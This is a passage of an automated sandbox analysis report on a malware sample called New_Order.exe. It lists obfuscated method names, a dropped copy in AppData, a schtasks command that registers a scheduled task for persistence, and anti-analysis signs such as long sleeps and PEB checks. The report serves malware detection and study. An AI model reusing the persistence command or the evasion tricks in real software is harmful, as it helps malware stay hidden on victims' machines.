            Source: 0.2.New_Order.exe.4726eb0.3.raw.unpack, w9NgRwSLiBUB45BpqD.csHigh entropy of concatenated method names: 'I2vvTrK7Po', 'oGZv3A877E', 'CqPucmIBNk', 'z3IutLtYlJ', 'hh9uB1DfBi', 'WjCuQ6sOgy', 'hGRuUllgEJ', 'RCnuCW6kcn', 'm7oujmBNnt', 'E5nuPJvjrL'
            Source: 0.2.New_Order.exe.e150000.7.raw.unpack, DGgk8FJ1T9SQqJsR4v.csHigh entropy of concatenated method names: 'UJToeKKvdW', 'BidobkwfF9', 'HE2ocB9loE', 'rJ3otoiyIJ', 'lDUo12bNxK', 'cIZoBLICZT', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.New_Order.exe.e150000.7.raw.unpack, bqmxolvPvPxiKNnaj2.csHigh entropy of concatenated method names: 'yPV81Xq4XY', 'N0y893QaIj', 'xt8851VtdI', 'L4p8022f60', 'oeD8MXmyV8', 'NDE8ODFEEY', 'sGR8VQtYLW', 'MYG8HWt0YJ', 'P5t8nW4cEC', 'P688s6qKaW'
            Source: 0.2.New_Order.exe.e150000.7.raw.unpack, DLCQ6qWPZ2npD2VK97c.csHigh entropy of concatenated method names: 'treGy1qibf', 'ybyGipLFXf', 'FRXGrUuCHE', 'vJjGFdmBGe', 'rt2GTs4Svq', 'sxnGKddxxe', 'e2NG3HvVJV', 'yDOGdnnM7D', 'I5tGD4QLqR', 'W5hGNoiLW7'
            Source: 0.2.New_Order.exe.e150000.7.raw.unpack, RsTPbKup2wq6YN65MQ.csHigh entropy of concatenated method names: 'OARYyxs9pg', 'gxhYi9vy10', 'RZUYrSRsHs', 'Gr2YFf1U75', 'qKBYT1vriX', 'VM9YK8sSkT', 'UvGY3x8yNV', 'VJIYd22uft', 'dJKYDOHfJM', 'SaxYNRkcHV'
            Source: 0.2.New_Order.exe.e150000.7.raw.unpack, goEE1epI6dHkIrNF1v.csHigh entropy of concatenated method names: 'XTEuFmx9Gb', 'JFRuK63C7a', 'HI1udFDKVp', 'F9nuDf9049', 'CvouqmoXL7', 'OixuS82yXG', 'R4buIQkajT', 'oFTuoWowAT', 'f04uGGZ1vl', 'GhYuX2CwSK'
            Source: 0.2.New_Order.exe.e150000.7.raw.unpack, oeaCEEWWlgoouEcLVPL.csHigh entropy of concatenated method names: 'ToString', 'nyWXRQDjhG', 'jmNX2aoZlN', 'd0SXJAjbJi', 'W93XwxKtpT', 'gZ8X8DaWW5', 'GToXu4hwH8', 'rq6XvqSN7t', 'ILg4krFXyPmSfIU5At6', 'uXdIpvFJ1AskUOf5PPn'
            Source: 0.2.New_Order.exe.e150000.7.raw.unpack, JPthFlW7Vq61JKub2YN.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'P4BX1wbtLb', 'E1nX9T8Hmy', 'xpKX5b1Si2', 'vpXX0D8hq7', 'p93XMJhcac', 'zUNXOkAOp7', 'tqVXVVrLxa'
            Source: 0.2.New_Order.exe.e150000.7.raw.unpack, nAjuhA9HsaZwFfDopo.csHigh entropy of concatenated method names: 'YDrRJRnu0B', 'X6IRwrbMju', 'u9ZR8MZ1Ml', 'LLcRupR7h1', 'he4RvtlTAJ', 't0lRpGrvc5', 'smiRYy0oob', 'upgRf5cVvv', 'UmxRhZpiVC', 'M6ZREG6lk6'
            Source: 0.2.New_Order.exe.e150000.7.raw.unpack, kycsHry1MAvVD8x7AF.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'HF3lnuYxld', 'N28lsw2m82', 'xM5lzqVlEg', 'DlnR73njkh', 'oIwRaEZ37C', 'llPRlDA8mK', 'LtpRRjuH9D', 'ElSrrCsFPAokaWPooEy'
            Source: 0.2.New_Order.exe.e150000.7.raw.unpack, BGayaGs6fsYETrsyVi.csHigh entropy of concatenated method names: 'futow8K3Ls', 'aqao8D1Hop', 'gblousriNU', 'vDrovws9PO', 'MSrop4uEJA', 'PJroYtnjRy', 'UYCofkXlpx', 'J31ohuGTBQ', 'CiSoEQOWWu', 'CO3o6Qs2PE'
            Source: 0.2.New_Order.exe.e150000.7.raw.unpack, PpqMW0zQO4To1KIirG.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'BgIGmiWxxW', 'nCHGqVU4qu', 'zC1GSdTMAO', 'flmGIaJtaM', 'IgvGo8kAwL', 'reDGGDp0ZO', 'xn5GXIMZFf'
            Source: 0.2.New_Order.exe.e150000.7.raw.unpack, uCptQ5ciPt496xv8vt.csHigh entropy of concatenated method names: 'hXbmdjRLTZ', 'yLtmDl9cEE', 'gB2meKIsbO', 'HCImbjoe6h', 'XZomtcHPFX', 'ID0mB1dPVp', 'MyamUFE7Jt', 'vAxmCAcqip', 'aYlmPKnbgx', 'kQemkKFAkH'
            Source: C:\Users\user\Desktop\New_Order.exe File created: C:\Users\user\AppData\Roaming\QjSljS.exe

            Boot Survival

            Source: C:\Users\user\Desktop\New_Order.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QjSljS" /XML "C:\Users\user\AppData\Local\Temp\tmpBC11.tmp
            Source: C:\Users\user\Desktop\New_Order.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wextract.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: Yara match File source: Process Memory Space: New_Order.exe PID: 7360, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: QjSljS.exe PID: 7860, type: MEMORYSTR
            Source: C:\Users\user\Desktop\New_Order.exe TID: 7380 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7648 Thread sleep count: 7146 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7644 Thread sleep count: 375 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7836 Thread sleep time: -9223372036854770s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7752 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7848 Thread sleep time: -7378697629483816s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7704 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Roaming\QjSljS.exe TID: 7912 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\wextract.exe TID: 2084 Thread sleep count: 185 > 30
            Source: C:\Windows\SysWOW64\wextract.exe TID: 2084 Thread sleep time: -370000s >= -30000s
            Source: C:\Windows\SysWOW64\wextract.exe TID: 2084 Thread sleep count: 9787 > 30
            Source: C:\Windows\SysWOW64\wextract.exe TID: 2084 Thread sleep time: -19574000s >= -30000s
            Source: C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe TID: 5828 Thread sleep time: -65000s >= -30000s
            Source: C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe TID: 5828 Thread sleep count: 32 > 30
            Source: C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe TID: 5828 Thread sleep time: -32000s >= -30000s
            Source: C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe TID: 5828 Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
            Source: C:\Windows\SysWOW64\wextract.exe Last function: Thread delayed
            Source: C:\Users\user\Desktop\New_Order.exe Code function: 10_2_012C096E rdtsc 10_2_012C096E
            Source: C:\Users\user\Desktop\New_Order.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\QjSljS.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7146
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 375
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7138
            Source: C:\Windows\SysWOW64\wextract.exe Window / User API: threadDelayed 9787
            Source: C:\Users\user\Desktop\New_Order.exe API coverage: 1.4 %
            Source: C:\Users\user\AppData\Roaming\QjSljS.exe API coverage: 0.4 %
            Source: C:\Users\user\Desktop\New_Order.exe Process information queried: ProcessInformation
            Source: MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166074080.0000000000E8F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^
            Source: C:\Users\user\Desktop\New_Order.exe Process token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
            Source: C:\Users\user\Desktop\New_Order.exe Code function: 10_2_012B0124 mov eax, dword ptr fs:[00000030h] 10_2_012B0124
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01278397 mov eax, dword ptr fs:[00000030h]10_2_01278397
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012903E9 mov eax, dword ptr fs:[00000030h]10_2_012903E9
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012903E9 mov eax, dword ptr fs:[00000030h]10_2_012903E9
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012903E9 mov eax, dword ptr fs:[00000030h]10_2_012903E9
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012903E9 mov eax, dword ptr fs:[00000030h]10_2_012903E9
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012903E9 mov eax, dword ptr fs:[00000030h]10_2_012903E9
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012903E9 mov eax, dword ptr fs:[00000030h]10_2_012903E9
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012903E9 mov eax, dword ptr fs:[00000030h]10_2_012903E9
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012903E9 mov eax, dword ptr fs:[00000030h]10_2_012903E9
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012B63FF mov eax, dword ptr fs:[00000030h]10_2_012B63FF
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0129E3F0 mov eax, dword ptr fs:[00000030h]10_2_0129E3F0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0129E3F0 mov eax, dword ptr fs:[00000030h]10_2_0129E3F0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0129E3F0 mov eax, dword ptr fs:[00000030h]10_2_0129E3F0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_013243D4 mov eax, dword ptr fs:[00000030h]10_2_013243D4
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_013243D4 mov eax, dword ptr fs:[00000030h]10_2_013243D4
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0128A3C0 mov eax, dword ptr fs:[00000030h]10_2_0128A3C0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0128A3C0 mov eax, dword ptr fs:[00000030h]10_2_0128A3C0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0128A3C0 mov eax, dword ptr fs:[00000030h]10_2_0128A3C0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0128A3C0 mov eax, dword ptr fs:[00000030h]10_2_0128A3C0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0128A3C0 mov eax, dword ptr fs:[00000030h]10_2_0128A3C0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0128A3C0 mov eax, dword ptr fs:[00000030h]10_2_0128A3C0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012883C0 mov eax, dword ptr fs:[00000030h]10_2_012883C0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012883C0 mov eax, dword ptr fs:[00000030h]10_2_012883C0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012883C0 mov eax, dword ptr fs:[00000030h]10_2_012883C0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012883C0 mov eax, dword ptr fs:[00000030h]10_2_012883C0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0132E3DB mov eax, dword ptr fs:[00000030h]10_2_0132E3DB
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0132E3DB mov eax, dword ptr fs:[00000030h]10_2_0132E3DB
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0132E3DB mov ecx, dword ptr fs:[00000030h]10_2_0132E3DB
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0132E3DB mov eax, dword ptr fs:[00000030h]10_2_0132E3DB
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_013063C0 mov eax, dword ptr fs:[00000030h]10_2_013063C0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0133C3CD mov eax, dword ptr fs:[00000030h]10_2_0133C3CD
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0127823B mov eax, dword ptr fs:[00000030h]10_2_0127823B
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01330274 mov eax, dword ptr fs:[00000030h]10_2_01330274
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01330274 mov eax, dword ptr fs:[00000030h]10_2_01330274
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01330274 mov eax, dword ptr fs:[00000030h]10_2_01330274
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01330274 mov eax, dword ptr fs:[00000030h]10_2_01330274
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01330274 mov eax, dword ptr fs:[00000030h]10_2_01330274
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01330274 mov eax, dword ptr fs:[00000030h]10_2_01330274
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01330274 mov eax, dword ptr fs:[00000030h]10_2_01330274
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01330274 mov eax, dword ptr fs:[00000030h]10_2_01330274
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01330274 mov eax, dword ptr fs:[00000030h]10_2_01330274
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01330274 mov eax, dword ptr fs:[00000030h]10_2_01330274
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01330274 mov eax, dword ptr fs:[00000030h]10_2_01330274
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01330274 mov eax, dword ptr fs:[00000030h]10_2_01330274
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01284260 mov eax, dword ptr fs:[00000030h]10_2_01284260
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01284260 mov eax, dword ptr fs:[00000030h]10_2_01284260
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01284260 mov eax, dword ptr fs:[00000030h]10_2_01284260
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0127826B mov eax, dword ptr fs:[00000030h]10_2_0127826B
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0133A250 mov eax, dword ptr fs:[00000030h]10_2_0133A250
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0133A250 mov eax, dword ptr fs:[00000030h]10_2_0133A250
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01286259 mov eax, dword ptr fs:[00000030h]10_2_01286259
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01308243 mov eax, dword ptr fs:[00000030h]10_2_01308243
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01308243 mov ecx, dword ptr fs:[00000030h]10_2_01308243
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0127A250 mov eax, dword ptr fs:[00000030h]10_2_0127A250
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012902A0 mov eax, dword ptr fs:[00000030h]10_2_012902A0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012902A0 mov eax, dword ptr fs:[00000030h]10_2_012902A0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_013162A0 mov eax, dword ptr fs:[00000030h]10_2_013162A0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_013162A0 mov ecx, dword ptr fs:[00000030h]10_2_013162A0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_013162A0 mov eax, dword ptr fs:[00000030h]10_2_013162A0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_013162A0 mov eax, dword ptr fs:[00000030h]10_2_013162A0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_013162A0 mov eax, dword ptr fs:[00000030h]10_2_013162A0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_013162A0 mov eax, dword ptr fs:[00000030h]10_2_013162A0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012BE284 mov eax, dword ptr fs:[00000030h]10_2_012BE284
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012BE284 mov eax, dword ptr fs:[00000030h]10_2_012BE284
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01300283 mov eax, dword ptr fs:[00000030h]10_2_01300283
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01300283 mov eax, dword ptr fs:[00000030h]10_2_01300283
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01300283 mov eax, dword ptr fs:[00000030h]10_2_01300283
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012902E1 mov eax, dword ptr fs:[00000030h]10_2_012902E1
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012902E1 mov eax, dword ptr fs:[00000030h]10_2_012902E1
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012902E1 mov eax, dword ptr fs:[00000030h]10_2_012902E1
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0128A2C3 mov eax, dword ptr fs:[00000030h]10_2_0128A2C3
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0128A2C3 mov eax, dword ptr fs:[00000030h]10_2_0128A2C3
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0128A2C3 mov eax, dword ptr fs:[00000030h]10_2_0128A2C3
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0128A2C3 mov eax, dword ptr fs:[00000030h]10_2_0128A2C3
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0128A2C3 mov eax, dword ptr fs:[00000030h]10_2_0128A2C3
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012AE53E mov eax, dword ptr fs:[00000030h]10_2_012AE53E
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012AE53E mov eax, dword ptr fs:[00000030h]10_2_012AE53E
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012AE53E mov eax, dword ptr fs:[00000030h]10_2_012AE53E
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012AE53E mov eax, dword ptr fs:[00000030h]10_2_012AE53E
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012AE53E mov eax, dword ptr fs:[00000030h]10_2_012AE53E
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01290535 mov eax, dword ptr fs:[00000030h]10_2_01290535
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01290535 mov eax, dword ptr fs:[00000030h]10_2_01290535
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01290535 mov eax, dword ptr fs:[00000030h]10_2_01290535
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01290535 mov eax, dword ptr fs:[00000030h]10_2_01290535
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01290535 mov eax, dword ptr fs:[00000030h]10_2_01290535
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01290535 mov eax, dword ptr fs:[00000030h]10_2_01290535
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01316500 mov eax, dword ptr fs:[00000030h]10_2_01316500
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01354500 mov eax, dword ptr fs:[00000030h]10_2_01354500
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01354500 mov eax, dword ptr fs:[00000030h]10_2_01354500
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01354500 mov eax, dword ptr fs:[00000030h]10_2_01354500
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01354500 mov eax, dword ptr fs:[00000030h]10_2_01354500
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01354500 mov eax, dword ptr fs:[00000030h]10_2_01354500
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01354500 mov eax, dword ptr fs:[00000030h]10_2_01354500
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01354500 mov eax, dword ptr fs:[00000030h]10_2_01354500
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012B656A mov eax, dword ptr fs:[00000030h]10_2_012B656A
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012B656A mov eax, dword ptr fs:[00000030h]10_2_012B656A
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012B656A mov eax, dword ptr fs:[00000030h]10_2_012B656A
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01288550 mov eax, dword ptr fs:[00000030h]10_2_01288550
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01288550 mov eax, dword ptr fs:[00000030h]10_2_01288550
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_013005A7 mov eax, dword ptr fs:[00000030h]10_2_013005A7
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_013005A7 mov eax, dword ptr fs:[00000030h]10_2_013005A7
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_013005A7 mov eax, dword ptr fs:[00000030h]10_2_013005A7
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012A45B1 mov eax, dword ptr fs:[00000030h]10_2_012A45B1
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012A45B1 mov eax, dword ptr fs:[00000030h]10_2_012A45B1
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012B4588 mov eax, dword ptr fs:[00000030h]10_2_012B4588
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01282582 mov eax, dword ptr fs:[00000030h]10_2_01282582
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01282582 mov ecx, dword ptr fs:[00000030h]10_2_01282582
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012BE59C mov eax, dword ptr fs:[00000030h]10_2_012BE59C
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012BC5ED mov eax, dword ptr fs:[00000030h]10_2_012BC5ED
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012BC5ED mov eax, dword ptr fs:[00000030h]10_2_012BC5ED
